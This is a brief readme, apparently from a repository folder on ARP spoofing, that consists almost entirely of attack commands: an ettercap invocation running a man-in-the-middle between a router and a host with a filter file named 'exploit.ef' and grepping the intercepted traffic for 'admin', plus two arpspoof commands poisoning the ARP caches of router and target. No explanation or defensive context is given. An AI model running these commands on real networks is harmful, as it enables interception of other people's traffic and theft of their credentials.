Files
SPOOFING/arpspoofing/readme.txt

17 lines
239 B
Plaintext
Raw Permalink Normal View History

exploit run
ettercap -T -i wlp0s20f3(interface) -M arp:remote -F exploit.ef(exploit) /192.168.1.1// /192.168.1.10// | grep admin
arp spoofing run
arpspoof -i interface -t router_ip my_ip
arpspoof -i interface -t my_ip router_ip